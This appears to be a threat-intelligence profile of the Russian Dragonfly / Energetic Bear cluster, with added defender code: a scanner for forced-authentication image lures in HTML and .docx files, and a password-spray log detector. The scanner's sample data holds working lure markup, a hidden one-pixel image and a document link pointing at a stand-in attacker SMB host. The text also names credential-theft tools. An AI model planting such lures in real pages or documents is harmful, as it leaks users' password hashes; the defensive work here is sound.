Dragonfly (also tracked as Energetic Bear, Crouching Yeti, Berserk Bear, Iron Liberty, Ghost Blizzard, TEMP.Isotope, Allanite, and MITRE ATT&CK G0035) is a Russian state-sponsored cyber-espionage and critical-infrastructure-targeting cluster active since at least 2010. The cluster is attributed to Russia's Federal Security Service (FSB), specifically Center 16 (the 16th Center for Radio-Electronic Intelligence, Military Unit 71330), the same FSB directorate that operates the Turla espionage cluster, though Dragonfly is operationally distinct and ICS/OT-focused. The 24 March 2022 unsealing of a US District of Kansas indictment named three FSB Center 16 officers, Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov, and Marat Valeryevich Tyukov, for a 2012-2017 campaign against more than 17,000 devices in 135 countries, including the Wolf Creek Nuclear Operating Corporation in Burlington, Kansas.
This indictment is the canonical public attribution. A separate same-day indictment in DC named Evgeny Viktorovich Gladkikh of TsNIIKhM (a Russian Ministry of Defense research institute) for the 2017 Triton / TRISIS attack on a Saudi petrochemical plant; that activity belongs to the separate Xenotime cluster and must not be conflated with Dragonfly. Operationally, Dragonfly is defined by sustained, methodical targeting of energy-sector business networks (electric utilities, oil and gas, nuclear, water and wastewater) and the ICS-vendor supply chain.
The cluster's earliest publicly documented operations (the 2011-2014 "Phase 1" Energetic Bear campaign) included trojanized ICS-software installers distributed via the compromised websites of three European ICS vendors (eWON / Talk2M, MB Connect Line / mbCONFTOOL, and MESA Imaging / SwissRanger), delivering the Havex backdoor (Backdoor.Oldrea), which performed OPC-protocol network reconnaissance against operational technology environments. That OPC scanning behavior was distinctive evidence of ICS-focused intent and remains one of the cluster's signature behaviors in retrospective analysis. The 2015-2017 "Dragonfly 2.0" campaign disclosed by Symantec in October 2017 marked a sustained second wave of operations against US, UK, Swiss, and Turkish electric utilities, including documented penetration of operational network segments and screen captures of HMI (human-machine interface) systems inside US energy networks.
Dragonfly 2.0 popularized the cluster's use of forced-authentication tradecraft (T1187): embedding single-pixel images referencing attacker-controlled SMB servers in maldoc lures and compromised energy-industry websites to harvest Net-NTLM hashes for offline cracking. From 2018 forward, operational signatures more often appear under the "Berserk Bear" label (CrowdStrike), "Iron Liberty" (Secureworks), and Microsoft's "Ghost Blizzard" naming. CISA's TA18-074A (March 2018) provided the first explicit US-government attribution of the cluster's pattern of activity to the Russian state.
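The forced-authentication lure described above leaves a concrete artifact in the document or web page itself: an image or other resource whose target is a UNC path or host-bearing file:// URL on a host outside the organization. The following defender-side scanner is an added example, not code from the original page or from any vendor report it cites; it looks for such references in HTML and inside the XML parts of an OOXML (.docx) file and flags only hosts that would be reached over the network boundary. The internal DNS suffix `corp.example`, the private address ranges, the sample HTML and the minimal .docx are all constructed for the example, and `203.0.113.10` is a documentation-range address standing in for an attacker-controlled SMB server.

```python
import io
import ipaddress
import re
import zipfile
from typing import List, Tuple

# Resource references that make Office or a browser authenticate to a file server:
# a UNC path (\\host\share\...) or a file:// URL that names a host
# (file://host/share or file:////host/share; file:///local/path has no host).
UNC_RE = re.compile(r'\\\\([A-Za-z0-9][A-Za-z0-9._-]*)\\')
FILE_URL_RE = re.compile(r'file:(?://|////)([A-Za-z0-9][A-Za-z0-9._-]*)/', re.IGNORECASE)

# Assumed internal address space and DNS suffix; adjust to the environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIXES = ("corp.example",)


def find_remote_hosts(text: str) -> List[str]:
    """Every host named by a UNC path or host-bearing file:// URL, in order of appearance."""
    found = []
    for rx in (UNC_RE, FILE_URL_RE):
        for m in rx.finditer(text):
            found.append((m.start(), m.group(1)))
    hosts: List[str] = []
    for _, host in sorted(found):
        if host not in hosts:
            hosts.append(host)
    return hosts


def is_external(host: str, internal_suffixes=INTERNAL_SUFFIXES) -> bool:
    """True when an SMB connection to this host would leave the internal network."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        return not any(ip in net for net in INTERNAL_NETS)
    h = host.lower()
    if "." not in h:
        return False  # bare NetBIOS name: resolvable only inside the domain
    return not any(h == s or h.endswith("." + s) for s in internal_suffixes)


def scan_html(html: str) -> List[str]:
    """External hosts referenced by a web page (e.g. a single-pixel <img> pointing at a share)."""
    return [h for h in find_remote_hosts(html) if is_external(h)]


def scan_docx_bytes(data: bytes) -> List[Tuple[str, str]]:
    """(zip entry, host) pairs for external SMB references inside an OOXML document.
    Remote images live in *.rels as Target="..." TargetMode="External"; field codes
    such as INCLUDEPICTURE sit in the XML parts, so every XML/rels entry is scanned."""
    hits: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            text = zf.read(name).decode("utf-8", "replace")
            hits.extend((name, h) for h in find_remote_hosts(text) if is_external(h))
    return hits


# Constructed sample page: one hidden pixel on a documentation-range IP, one local
# image, and one image on an internal file server that must not be flagged.
SAMPLE_HTML = (
    '<html><body><p>Quarterly safety briefing</p>'
    r'<img src="\\203.0.113.10\share\pixel.png" width="1" height="1">'
    '<img src="/images/logo.png">'
    r'<img src="\\fileserver.corp.example\public\banner.png">'
    '</body></html>'
)


def build_sample_docx() -> bytes:
    """Constructed minimal .docx whose image relationship targets an external host."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="file://203.0.113.10/share/pixel.png" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="media/image1.png"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print("HTML external SMB hosts:", scan_html(SAMPLE_HTML))
    print("DOCX external SMB refs:", scan_docx_bytes(build_sample_docx()))
```

The host classification deliberately treats bare NetBIOS names and private ranges as internal, so the scanner surfaces the lure without drowning analysts in references to legitimate file servers; a complementary network control is to block outbound TCP/445 at the perimeter, which prevents the Net-NTLM exchange even when a lure is opened.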
CISA / FBI AA20-296A (October 2020) disclosed successful compromise of two US State, Local, Tribal, and Territorial (SLTT) government networks during the 2020 US election cycle via exploitation of Citrix (CVE-2019-19781), Exchange (CVE-2020-0688), Fortinet (CVE-2018-13379), and Cisco router vulnerabilities, paired with password spraying. The cluster's toolkit is comparatively pragmatic and not heavy on bespoke implants: Havex (Backdoor.Oldrea) and Karagany (Trojan.Karagany) are the most-cited legacy implants, along with Heriplor (a backdoor unique to the cluster) and Goodor. Beyond these, it relies substantially on living-off-the-land tooling (PowerShell, mshta, schtasks, rundll32, certutil) and open-source credential-access utilities (Mimikatz, Hydra, CrackMapExec, Impacket / secretsdump, PsExec).
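The password spraying that AA20-296A pairs with the edge-device exploits has a recognizable shape in authentication logs: one source fails against many distinct accounts with only one or two attempts each, which keeps every account under its lockout threshold. The detector below is an added example, not code from the page or from CISA; it parses constructed, flattened Windows Security event 4625 lines (the field names follow the 4625 schema, the line layout is an assumption for the example), groups failures by source address, and flags any source that touches at least `min_accounts` accounts within a sliding window while never exceeding `max_per_account` tries on any one of them. The sample includes a spray, a single-account brute force, and a user mistyping a password, so the contrast between the three is visible.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

# One failed-logon record (Windows Security event 4625) flattened into a line.
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+EventID=4625\s+TargetUserName=(?P<user>\S+)\s+'
    r'IpAddress=(?P<ip>\S+)\s+Status=(?P<status>0x[0-9A-Fa-f]+)\s+SubStatus=(?P<sub>0x[0-9A-Fa-f]+)'
)

# NTSTATUS sub-status codes carried by 4625; a spray usually shows both of the
# first two because usernames are guessed alongside passwords.
SUBSTATUS = {"0xC000006A": "bad password", "0xC0000064": "no such user",
             "0xC0000234": "account locked out"}


class Failure(NamedTuple):
    ts: datetime
    user: str
    ip: str
    reason: str


def parse_events(lines: str) -> List[Failure]:
    """Parse the flattened 4625 lines; anything that does not match is skipped."""
    events = []
    for line in lines.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        sub = "0x" + m["sub"][2:].upper()
        events.append(Failure(datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                              m["user"].lower(), m["ip"], SUBSTATUS.get(sub, sub)))
    return events


def detect_spray(lines: str, window_minutes: int = 10,
                 min_accounts: int = 5, max_per_account: int = 2) -> Dict[str, dict]:
    """Flag source IPs that fail against many distinct accounts with few tries each
    inside one window: the low-and-slow shape of a spray, as opposed to a brute
    force (many tries, one account) or an ordinary user mistyping a password."""
    by_ip: Dict[str, List[Failure]] = defaultdict(list)
    for e in parse_events(lines):
        by_ip[e.ip].append(e)
    alerts: Dict[str, dict] = {}
    for ip, evts in by_ip.items():
        evts.sort(key=lambda e: e.ts)
        for i, start in enumerate(evts):
            window_end = start.ts + timedelta(minutes=window_minutes)
            in_window = [e for e in evts[i:] if e.ts <= window_end]
            tries = Counter(e.user for e in in_window)
            if len(tries) >= min_accounts and max(tries.values()) <= max_per_account:
                alerts[ip] = {
                    "accounts": sorted(tries),
                    "first": start.ts.isoformat(),
                    "last": in_window[-1].ts.isoformat(),
                    "reasons": sorted({e.reason for e in in_window}),
                }
                break  # report each source once
    return alerts


# Constructed sample: a spray from 203.0.113.77 (six accounts, one try each),
# a brute force against "admin" from 198.51.100.5, and a benign double failure.
SAMPLE_LOG = """
2020-10-14T02:11:05Z EventID=4625 TargetUserName=alice IpAddress=203.0.113.77 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:12:41Z EventID=4625 TargetUserName=bob IpAddress=203.0.113.77 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:13:58Z EventID=4625 TargetUserName=carol IpAddress=203.0.113.77 Status=0xC000006D SubStatus=0xC0000064
2020-10-14T02:15:10Z EventID=4625 TargetUserName=dave IpAddress=203.0.113.77 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:16:33Z EventID=4625 TargetUserName=erin IpAddress=203.0.113.77 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:17:49Z EventID=4625 TargetUserName=frank IpAddress=203.0.113.77 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:01Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:02Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:03Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:04Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:05Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:06Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:07Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T02:20:08Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T09:00:12Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.5 Status=0xC000006D SubStatus=0xC000006A
2020-10-14T09:00:20Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.5 Status=0xC000006D SubStatus=0xC000006A
"""

if __name__ == "__main__":
    for ip, detail in detect_spray(SAMPLE_LOG).items():
        print(ip, detail)
```

The thresholds are the tunable part: a spray against an externally exposed service (VPN, OWA, Citrix) is often slower than ten minutes per pass, so production logic typically keeps per-source state across hours and also correlates the source with later successful logons (event 4624) to catch the one password that worked.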
Public attribution and the 2022 indictment have not produced a visible operational pause. As of the project handoff date, Dragonfly's operators are assessed by CISA, NCSC UK, and partner agencies to remain active against Western critical infrastructure, although 2023-2025 public reporting attributes much of the visible Russian state-aligned ICS-targeting activity to Sandworm or to less-specific "Russian state-aligned" framing rather than to the Dragonfly cluster by name. Dragos's ALLANITE designation tracks the energy-grid-focused subset of the activity.